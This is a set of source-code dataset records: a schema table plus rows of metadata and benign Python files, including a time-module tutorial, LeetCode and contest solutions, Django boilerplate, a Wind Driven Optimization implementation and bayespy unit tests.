Dataset schema (column name, type, observed range/classes):

| Column | Type | Range / Classes |
|---|---|---|
| blob_id | string | lengths 40–40 |
| directory_id | string | lengths 40–40 |
| path | string | lengths 3–616 |
| content_id | string | lengths 40–40 |
| detected_licenses | sequence | lengths 0–112 |
| license_type | string | 2 classes |
| repo_name | string | lengths 5–115 |
| snapshot_id | string | lengths 40–40 |
| revision_id | string | lengths 40–40 |
| branch_name | string | 777 classes |
| visit_date | timestamp[us] | 2015-08-06 10:31:46 – 2023-09-06 10:44:38 |
| revision_date | timestamp[us] | 1970-01-01 02:38:32 – 2037-05-03 13:00:00 |
| committer_date | timestamp[us] | 1970-01-01 02:38:32 – 2023-09-06 01:08:06 |
| github_id | int64 | 4.92k – 681M (nullable ⌀) |
| star_events_count | int64 | 0 – 209k |
| fork_events_count | int64 | 0 – 110k |
| gha_license_id | string | 22 classes |
| gha_event_created_at | timestamp[us] | 2012-06-04 01:52:49 – 2023-09-14 21:59:50 (nullable ⌀) |
| gha_created_at | timestamp[us] | 2008-05-22 07:58:19 – 2023-08-21 12:35:19 (nullable ⌀) |
| gha_language | string | 149 classes |
| src_encoding | string | 26 classes |
| language | string | 1 class |
| is_vendor | bool | 2 classes |
| is_generated | bool | 2 classes |
| length_bytes | int64 | 3 – 10.2M |
| extension | string | 188 classes |
| content | string | lengths 3 – 10.2M |
| authors | sequence | lengths 1–1 |
| author_id | string | lengths 1–132 |
2277163fb77406568bbbbfd4c43fbc3d8f8704ff | 583db8851c609f03f722884557cfc67de0ce564e | /pysmapi/interfaces/Event_Stream_Add.py | 8592834aefd487a4a877f75155c9b4f73ace2267 | [
"Apache-2.0"
] | permissive | lllucius/pysmapi | ab0b4409bfda6a61dab7805e2033d71d09a96493 | c0d802edb58e835e4d48cb9c28ccfccfe5b5c686 | refs/heads/master | 2020-04-20T18:07:46.699611 | 2019-06-25T04:27:41 | 2019-06-25T04:27:41 | 169,009,326 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,169 | py |
# Copyright 2018-2019 Leland Lucius
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import struct
from pysmapi.smapi import *
class Event_Stream_Add(Request):
def __init__(self,
event_info = "",
**kwargs):
super(Event_Stream_Add, self).__init__(**kwargs)
# Request parameters
self._event_info = event_info
@property
def event_info(self):
return self._event_info
@event_info.setter
def event_info(self, value):
self._event_info = value
def pack(self, **kwargs):
# event_info (string,1-maxlength,charNA)
buf = s2b(self._event_info)
return buf
| [
"[email protected]"
] | |
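A minimal usage sketch for the `Event_Stream_Add` request class above. Whether the `Request` base class needs connection keyword arguments depends on `pysmapi.smapi`, so this only illustrates this class's own interface; the event string is a placeholder:

```python
# Sketch only: event_info is a placeholder value.
from pysmapi.interfaces.Event_Stream_Add import Event_Stream_Add

req = Event_Stream_Add(event_info="sample event data")
req.event_info = "updated event data"  # property setter defined above
payload = req.pack()                   # s2b()-encoded event_info
print(payload)
```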
173d992267a4c50b4df509c54add6f9396d75fbc | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p02821/s313302941.py | 271131d42505bd3b94253e5c4d6e944e2905ed13 | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 841 | py | n, m = map(int, input().split())
a = list(map(int, input().split()))
def cumsum(s):
    # prefix sums: cs[i] = sum of the first i elements of s
    n = len(s)
    cs = [0] * (n+1)
    for i in range(n):
        cs[i+1] = cs[i] + s[i]
    return cs
def bs_list(a, f):
    # binary search: smallest index whose element satisfies f, or None
    l, r = -1, len(a)
    while r - l > 1:
        x = (l + r) // 2
        if f(a[x]): r = x
        else: l = x
    return None if r == len(a) else r
a.sort()
ca = cumsum(a)
def detect(x):
    # count ordered pairs (b, y) with b + y >= x; True if at most m of them
    num = 0
    for b in a[::-1]:
        res = bs_list(a, lambda y: y >= x - b)
        if res is None: break
        num += n - res
    return num <= m
# binary-search the smallest threshold r such that at most m pair sums reach r
l, r = -1, 10**5*2+10
while r - l > 1:
    x = (l+r) // 2
    if detect(x): r = x
    else: l = x
# add up all pair sums >= r, then fill the remaining m - c pairs at value l
s, c = 0, 0
for b in a[::-1]:
    res = bs_list(a, lambda x: x >= r - b)
    if res is None: break
    c += (n - res)
    s += b * (n - res) + (ca[n] - ca[res])
print(s + (m - c) * l)
| [
"[email protected]"
] | |
48029ad550be99084bdc75771e75b28299f992dd | 8e24e8bba2dd476f9fe612226d24891ef81429b7 | /geeksforgeeks/python/basic/28_1.py | 8bba51f3b7f6bc07e66c3cce6c8bb5320e828687 | [] | no_license | qmnguyenw/python_py4e | fb56c6dc91c49149031a11ca52c9037dc80d5dcf | 84f37412bd43a3b357a17df9ff8811eba16bba6e | refs/heads/master | 2023-06-01T07:58:13.996965 | 2021-06-15T08:39:26 | 2021-06-15T08:39:26 | 349,059,725 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 4,733 | py | Time Functions in Python | Set 1 (time(), ctime(), sleep()…)
Python provides a module, “time”, which allows us to handle various
operations regarding time, its conversions and representations, and which
finds use in many applications. Time measurement starts from **1 January
1970, 12:00 am**, and this reference point is termed the “**epoch**” in
Python.
**Operations on Time:**
**1\. time()** :- This function is used to count the number of **seconds
elapsed since the epoch**.
**2\. gmtime(sec)** :- This function returns a **structure with 9 values**,
each representing a time attribute in sequence. It converts **seconds into
time attributes (days, years, months etc.)** counted from the epoch up to the
specified seconds. If no seconds are mentioned, the current time is used. The
structure attribute table is given below.
| Index | Attribute | Values |
|---|---|---|
| 0 | tm_year | e.g. 2008 |
| 1 | tm_mon | 1 to 12 |
| 2 | tm_mday | 1 to 31 |
| 3 | tm_hour | 0 to 23 |
| 4 | tm_min | 0 to 59 |
| 5 | tm_sec | 0 to 61 (60 or 61 are leap-seconds) |
| 6 | tm_wday | 0 to 6 |
| 7 | tm_yday | 1 to 366 |
| 8 | tm_isdst | -1, 0, 1 where -1 means library determines DST |
```python
# Python code to demonstrate the working of
# time() and gmtime()
# importing "time" module for time operations
import time
# using time() to display time since epoch
print ("Seconds elapsed since the epoch are : ",end="")
print (time.time())
# using gmtime() to return the time attribute structure
print ("Time calculated acc. to given seconds is : ")
print (time.gmtime())
```
Output:
Seconds elapsed since the epoch are : 1470121951.9536893
Time calculated acc. to given seconds is :
time.struct_time(tm_year=2016, tm_mon=8, tm_mday=2,
tm_hour=7, tm_min=12, tm_sec=31, tm_wday=1,
tm_yday=215, tm_isdst=0)
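Since time() returns seconds elapsed since the epoch, a common use is timing a block of code; a small illustration:

```python
import time

start = time.time()
time.sleep(1.5)                  # stand-in for real work
elapsed = time.time() - start
print("Elapsed: %.2f seconds" % elapsed)
```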
**3\. asctime(“time”)** :- This function takes a time structure as
produced by gmtime() and returns a **24-character string denoting time**.

**4\. ctime(sec)** :- This function also returns a **24-character time
string**, but takes seconds as its argument and **computes the time up to the
mentioned seconds**. If no argument is passed, the current time is used.
```python
# Python code to demonstrate the working of
# asctime() and ctime()
# importing "time" module for time operations
import time
# initializing time using gmtime()
ti = time.gmtime()
# using asctime() to display time acc. to time mentioned
print ("Time calculated using asctime() is : ",end="")
print (time.asctime(ti))
# using ctime() to display time string using seconds
print ("Time calculated using ctime() is : ", end="")
print (time.ctime())
```
Output:
Time calculated using asctime() is : Tue Aug 2 07:47:02 2016
Time calculated using ctime() is : Tue Aug 2 07:47:02 2016
**5\. sleep(sec)** :- This method is used to **halt the program execution**
for the time specified in the arguments.
```python
# Python code to demonstrate the working of
# sleep()
# importing "time" module for time operations
import time
# using ctime() to show present time
print ("Start Execution : ",end="")
print (time.ctime())
# using sleep() to hault execution
time.sleep(4)
# using ctime() to show present time
print ("Stop Execution : ",end="")
print (time.ctime())
```
Output:
Start Execution : Tue Aug 2 07:59:03 2016
Stop Execution : Tue Aug 2 07:59:07 2016
This article is contributed by **Manjeet Singh**.
| [
"[email protected]"
] | |
0171b167d839283f68195e743403d47603fa9f35 | 53fab060fa262e5d5026e0807d93c75fb81e67b9 | /backup/user_004/ch15_2019_03_15_12_37_22_879295.py | 63ff08a3f9db6f997d4660dad3874728fbdd779e | [] | no_license | gabriellaec/desoft-analise-exercicios | b77c6999424c5ce7e44086a12589a0ad43d6adca | 01940ab0897aa6005764fc220b900e4d6161d36b | refs/heads/main | 2023-01-31T17:19:42.050628 | 2020-12-16T05:21:31 | 2020-12-16T05:21:31 | 306,735,108 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 78 | py | import math
def volume_da_pizza(z, a):
v=(math.pi*(z**2))*a
return v
| [
"[email protected]"
] | |
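A quick call of the helper above, which computes the cylinder volume pi * z**2 * a (the classic "pizza volume" formula):

```python
print(volume_da_pizza(3, 10))  # ~282.74, i.e. math.pi * 3**2 * 10
```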
45ea3e7d8004d23bd4b5fe78a403b5515a80826a | 42000e14d25ce3de5b9ba24e3399e67bf88c4ad1 | /Level_Three/ProTwo/AppTwo/migrations/0001_initial.py | db9703f5f9d755c7f363b452bdc1ccaea87e2c26 | [] | no_license | cdunn6754/Django_Projects | 0528b3263e2762d0e872686ec5f00a40f3730851 | 545d4e73f05969d1277cacaab2042787676b7e73 | refs/heads/master | 2021-09-11T18:21:07.249977 | 2018-04-11T00:06:27 | 2018-04-11T00:06:27 | 110,480,579 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 682 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.8 on 2018-04-05 00:27
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='User',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('first_name', models.CharField(max_length=264)),
('last_name', models.CharField(max_length=264)),
('email', models.EmailField(max_length=264)),
],
),
]
| [
"[email protected]"
] | |
ff5481487e54507a28f7f346fc73b088e009771b | fcc88521f63a3c22c81a9242ae3b203f2ea888fd | /Python3/0006-ZigZag-Conversion/soln.py | f2d94cda1de538a16f8a63dbbbb03073bd1a954e | [
"MIT"
] | permissive | wyaadarsh/LeetCode-Solutions | b5963e3427aa547d485d3a2cb24e6cedc72804fd | 3719f5cb059eefd66b83eb8ae990652f4b7fd124 | refs/heads/master | 2022-12-06T15:50:37.930987 | 2020-08-30T15:49:27 | 2020-08-30T15:49:27 | 291,811,790 | 0 | 1 | MIT | 2020-08-31T19:57:35 | 2020-08-31T19:57:34 | null | UTF-8 | Python | false | false | 510 | py | import functools
class Solution:
def convert(self, s, numRows):
"""
:type s: str
:type numRows: int
:rtype: str
"""
if numRows == 1 or len(s) <= numRows:
return s
rows = [[] for _ in range(numRows)]
row, drow = 0, 1
for ch in s:
rows[row].append(ch)
row += drow
if row == 0 or row == numRows - 1:
drow = -drow
return ''.join(functools.reduce(operator.add, rows)) | [
"[email protected]"
] | |
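A quick check of the `Solution.convert` method above, using the standard examples for LeetCode problem 6:

```python
sol = Solution()
print(sol.convert("PAYPALISHIRING", 3))  # PAHNAPLSIIGYIR
print(sol.convert("PAYPALISHIRING", 4))  # PINALSIGYAHRPI
```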
ae6dccb3f41dacf3ab006321ca502a67ca354237 | 15ab83191e9aeb58433d578582d8c24ecd68bbaf | /backend/manage.py | 7ecd4a62b90eeb57c918b2b0eab5d8f0c9e39ac1 | [] | no_license | crowdbotics-apps/ecommerce-27317 | 6b36638113b5e64c537ef3e1e674132dd4c21bae | 1f2e00366e112aa3acf74362fba31af42c5589c1 | refs/heads/master | 2023-05-01T22:50:02.897152 | 2021-05-24T11:58:30 | 2021-05-24T11:58:30 | 370,334,856 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 635 | py | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommerce_27317.settings")
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
9f52c25f81a9401c049a07ab2f0d2bf4f56c2f38 | b87b4f2ad90390e6dcb53f258077ea6fea574f6c | /tests/test_models/test_user_model.py | 86f00ff5b9e2c85d4cf23f0173349b8b234bc5ee | [] | no_license | Wassally/backend | 1b73510ee451d433c1f747be5356c4e11b6e914a | 01071eb94ecfc3a3b260ae957a0aa638271c66b1 | refs/heads/master | 2022-11-26T13:24:01.684833 | 2019-06-30T06:02:29 | 2019-06-30T06:02:29 | 177,253,039 | 2 | 0 | null | 2022-11-22T03:30:11 | 2019-03-23T06:29:15 | Python | UTF-8 | Python | false | false | 805 | py | from django.test import TestCase
from api.factories import ClientFactory, CaptainFactory
from api.models import User, Captain
class ClientTest(TestCase):
def test_creation_client(self):
client = ClientFactory()
self.assertTrue(isinstance(client, User))
self.assertEqual(
client.__str__(),
"%d: %s" % (client.id, client.username)
)
self.assertTrue(client.is_client)
self.assertFalse(client.is_captain)
class CaptainTest(TestCase):
def test_creation_captain(self):
captain = CaptainFactory()
self.assertTrue(isinstance(captain, Captain))
self.assertEqual(captain.__str__(), captain.user.username)
self.assertTrue(captain.user.is_captain)
self.assertFalse(captain.user.is_client)
| [
"[email protected]"
] | |
b036d6fd8e95f539ae982a23cf985148ad491aca | bcabce262e54a6ac38948a4717254cdc3ce65874 | /mealpy/physics_based/WDO.py | 3e376916b7ec257ba7469ad4a3260e10a7cdabce | [
"MIT"
] | permissive | ibrahim85/MEta-heuristics-ALgorithms-in-PYthon | 4ab6e6ef54127b6f4721178a1f855d1be91f9b42 | 47fb428e8378fc52cd5fe6eff20cec1c68ba5039 | refs/heads/master | 2023-06-03T05:23:31.993100 | 2021-06-28T14:48:38 | 2021-06-28T14:48:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | #!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 21:18, 17/03/2020 %
# %
# Email: [email protected] %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform, randint
from numpy import ones, clip
from mealpy.root import Root
class BaseWDO(Root):
"""
The original version of : Wind Driven Optimization (WDO)
The Wind Driven Optimization Technique and its Application in Electromagnetics
Link:
https://ieeexplore.ieee.org/abstract/document/6407788
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100,
RT=3, g=0.2, alp=0.4, c=0.4, max_v=0.3, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch
self.pop_size = pop_size
self.RT = RT # RT coefficient
self.g = g # gravitational constant
self.alp = alp # constants in the update equation
self.c = c # coriolis effect
self.max_v = max_v # maximum allowed speed
def train(self):
"""
# pop is the set of "air parcel" - "position"
        # air parcel: the set of gas atoms; each atom represents a dimension in position and has its own velocity
# pressure represented by fitness value
"""
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop, self.ID_FIT, self.ID_MIN_PROB)
list_velocity = self.max_v * uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
for epoch in range(self.epoch):
# Update velocity based on random dimensions and position of global best
for i in range(self.pop_size):
rand_dim = randint(0, self.problem_size)
temp = list_velocity[i][rand_dim] * ones(self.problem_size)
vel = (1 - self.alp)*list_velocity[i] - self.g * pop[i][self.ID_POS] + \
(1 - 1.0/(i+1)) * self.RT * (g_best[self.ID_POS] - pop[i][self.ID_POS]) + self.c * temp / (i+1)
vel = clip(vel, -self.max_v, self.max_v)
# Update air parcel positions, check the bound and calculate pressure (fitness)
pos = pop[i][self.ID_POS] + vel
pos = self.amend_position_faster(pos)
fit = self.get_fitness_position(pos)
pop[i] = [pos, fit]
list_velocity[i] = vel
## batch size idea
if self.batch_idea:
if (i + 1) % self.batch_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
else:
if (i + 1) % self.pop_size == 0:
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| [
"[email protected]"
] | |
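A minimal usage sketch for the `BaseWDO` optimizer above. The sphere objective and the dimension/epoch numbers are arbitrary illustrative choices, and list bounds are assumed to be accepted by the `Root` base class as elsewhere in mealpy:

```python
import numpy as np

def sphere(solution):
    # simple convex objective: sum of squares, minimum at the origin
    return np.sum(solution ** 2)

model = BaseWDO(obj_func=sphere, lb=[-10] * 10, ub=[10] * 10,
                verbose=True, epoch=100, pop_size=50)
best_pos, best_fit, loss_history = model.train()
print(best_fit)
```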
4ad8ad1fbd7235c212a139cdeafe67ce534debf4 | afc8d5a9b1c2dd476ea59a7211b455732806fdfd | /Configurations/WH_chargeAsymmetry/WH3l/Full2018_v7/structure.py | 6388a09a0a8e38670a88995180d3619b60830e60 | [] | no_license | latinos/PlotsConfigurations | 6d88a5ad828dde4a7f45c68765081ed182fcda21 | 02417839021e2112e740607b0fb78e09b58c930f | refs/heads/master | 2023-08-18T20:39:31.954943 | 2023-08-18T09:23:34 | 2023-08-18T09:23:34 | 39,819,875 | 10 | 63 | null | 2023-08-10T14:08:04 | 2015-07-28T07:36:50 | Python | UTF-8 | Python | false | false | 2,018 | py | # structure configuration for datacard
#structure = {}
# keys here must match keys in samples.py
#
structure['Fake'] = {
'isSignal' : 0,
'isData' : 0
}
#structure['DY'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
#
#structure['top'] = {
# 'isSignal' : 0,
# 'isData' : 0
# }
structure['WW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggWW'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Wg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Zg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['Vg'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VgS'] = {
'isSignal' : 0,
'isData' : 0
}
structure['WZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['VVV'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ZZ'] = {
'isSignal' : 0,
'isData' : 0
}
structure['ggH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['qqH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_plus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['WH_hww_minus'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ttH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggZH_hww'] = {
'isSignal' : 1,
'isData' : 0
}
structure['ggH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['qqH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_plus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['WH_htt_minus'] = {
'isSignal' : 1,
'isData' : 0,
}
structure['ZH_htt'] = {
'isSignal' : 1,
'isData' : 0,
}
# data
structure['DATA'] = {
'isSignal' : 0,
'isData' : 1
}
| [
"[email protected]"
] | |
b7cd7a5240afedad530791addc956ba6291b5595 | 54b31b705d88e21bc0b23aabe1df15ca13a07de2 | /bayespy/inference/vmp/nodes/tests/test_concatenate.py | 26d7882980d98f8e8baf3e70236fbf7d7c701405 | [
"MIT",
"LicenseRef-scancode-proprietary-license",
"LicenseRef-scancode-unknown-license-reference",
"AFL-3.0",
"GPL-1.0-or-later",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | bayespy/bayespy | 307ef4c51d511e14d4693cce9929dda37124d11d | 5fe58f7160ebc3a9df7f9e96e50d2bd47837794a | refs/heads/develop | 2023-08-18T21:35:27.744022 | 2023-05-25T08:16:36 | 2023-05-25T08:16:36 | 5,568,322 | 655 | 164 | MIT | 2023-08-15T09:31:55 | 2012-08-27T08:10:20 | Python | UTF-8 | Python | false | false | 10,082 | py | ################################################################################
# Copyright (C) 2015 Jaakko Luttinen
#
# This file is licensed under the MIT License.
################################################################################
"""
Unit tests for `concatenate` module.
"""
import warnings
import numpy as np
from bayespy.nodes import (Concatenate,
GaussianARD,
Gamma)
from bayespy.utils import random
from bayespy.utils.misc import TestCase
class TestConcatenate(TestCase):
"""
Unit tests for Concatenate node.
"""
def test_init(self):
"""
Test the creation of Concatenate node
"""
# One parent only
X = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (), () ))
X = GaussianARD(0, 1, plates=(3,), shape=(2,4))
Y = Concatenate(X)
self.assertEqual(Y.plates, (3,))
self.assertEqual(Y.dims, ( (2,4), (2,4,2,4) ))
# Two parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Two parents with shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (4,6), (4,6,4,6) ))
# Two parents with non-default axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
self.assertEqual(Y.plates, (5,4))
self.assertEqual(Y.dims, ( (), () ))
# Three parents
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
X3 = GaussianARD(0, 1, plates=(4,), shape=())
Y = Concatenate(X1, X2, X3)
self.assertEqual(Y.plates, (9,))
self.assertEqual(Y.dims, ( (), () ))
# Constant parent
X1 = [7.2, 3.5]
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
self.assertEqual(Y.plates, (5,))
self.assertEqual(Y.dims, ( (), () ))
# Different moments
X1 = GaussianARD(0, 1, plates=(3,))
X2 = Gamma(1, 1, plates=(4,))
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible shapes
X1 = GaussianARD(0, 1, plates=(3,), shape=(2,))
X2 = GaussianARD(0, 1, plates=(2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
# Incompatible plates
X1 = GaussianARD(0, 1, plates=(4,3), shape=())
X2 = GaussianARD(0, 1, plates=(5,2,), shape=())
self.assertRaises(ValueError,
Concatenate,
X1,
X2)
pass
def test_message_to_child(self):
"""
Test the message to child of Concatenate node.
"""
var = lambda plates, shape: GaussianARD(
np.random.randn(*(plates + shape)),
np.random.rand(*(plates + shape)),
plates=plates,
shape=shape
)
# Two parents without shapes
X1 = var((2,), ())
X2 = var((3,), ())
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,)))[:2],
u1[0]*np.ones((2,)))
self.assertAllClose((u[1]*np.ones((5,)))[:2],
u1[1]*np.ones((2,)))
self.assertAllClose((u[0]*np.ones((5,)))[2:],
u2[0]*np.ones((3,)))
self.assertAllClose((u[1]*np.ones((5,)))[2:],
u2[1]*np.ones((3,)))
# Two parents with shapes
X1 = var((2,), (4,))
X2 = var((3,), (4,))
Y = Concatenate(X1, X2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
# Test with non-constant axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Y = Concatenate(X1, X2, axis=-2)
u1 = X1.get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[:2],
u1[1]*np.ones((2,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4)))[2:],
u2[1]*np.ones((3,4)))
# Test with constant parent
X1 = np.random.randn(2, 4)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,))
Y = Concatenate(X1, X2)
u1 = Y.parents[0].get_moments()
u2 = X2.get_moments()
u = Y.get_moments()
self.assertAllClose((u[0]*np.ones((5,4)))[:2],
u1[0]*np.ones((2,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[:2],
u1[1]*np.ones((2,4,4)))
self.assertAllClose((u[0]*np.ones((5,4)))[2:],
u2[0]*np.ones((3,4)))
self.assertAllClose((u[1]*np.ones((5,4,4)))[2:],
u2[1]*np.ones((3,4,4)))
pass
def test_message_to_parent(self):
"""
Test the message to parents of Concatenate node.
"""
# Two parents without shapes
X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,)))[:2],
m1[0]*np.ones((2,)))
self.assertAllClose((m[1]*np.ones((5,)))[:2],
m1[1]*np.ones((2,)))
self.assertAllClose((m[0]*np.ones((5,)))[2:],
m2[0]*np.ones((3,)))
self.assertAllClose((m[1]*np.ones((5,)))[2:],
m2[1]*np.ones((3,)))
# Two parents with shapes
with warnings.catch_warnings():
warnings.simplefilter("ignore", FutureWarning)
X1 = GaussianARD(0, 1, plates=(2,), shape=(4,6))
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
# Two parents with non-default concatenation axis
X1 = GaussianARD(0, 1, plates=(2,4), shape=())
X2 = GaussianARD(0, 1, plates=(3,4), shape=())
Z = Concatenate(X1, X2, axis=-2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = X1._message_from_children()
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4)))[:2],
m1[0]*np.ones((2,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[:2],
m1[1]*np.ones((2,4)))
self.assertAllClose((m[0]*np.ones((5,4)))[2:],
m2[0]*np.ones((3,4)))
self.assertAllClose((m[1]*np.ones((5,4)))[2:],
m2[1]*np.ones((3,4)))
# Constant parent
X1 = np.random.randn(2,4,6)
X2 = GaussianARD(0, 1, plates=(3,), shape=(4,6))
Z = Concatenate(X1, X2)
Y = GaussianARD(Z, 1)
Y.observe(np.random.randn(*Y.get_shape(0)))
m1 = Z._message_to_parent(0)
m2 = X2._message_from_children()
m = Z._message_from_children()
self.assertAllClose((m[0]*np.ones((5,4,6)))[:2],
m1[0]*np.ones((2,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[:2],
m1[1]*np.ones((2,4,6,4,6)))
self.assertAllClose((m[0]*np.ones((5,4,6)))[2:],
m2[0]*np.ones((3,4,6)))
self.assertAllClose((m[1]*np.ones((5,4,6,4,6)))[2:],
m2[1]*np.ones((3,4,6,4,6)))
pass
def test_mask_to_parent(self):
"""
Test the mask handling in Concatenate node
"""
pass
| [
"[email protected]"
] | |
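The behaviour exercised by `test_init` above can be condensed into a short standalone sketch: by default `Concatenate` joins its parents along the last plate axis, so the plate counts simply add up:

```python
from bayespy.nodes import GaussianARD, Concatenate

X1 = GaussianARD(0, 1, plates=(2,), shape=())
X2 = GaussianARD(0, 1, plates=(3,), shape=())
Y = Concatenate(X1, X2)
print(Y.plates)  # (5,) -- two plates from X1 plus three from X2
```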
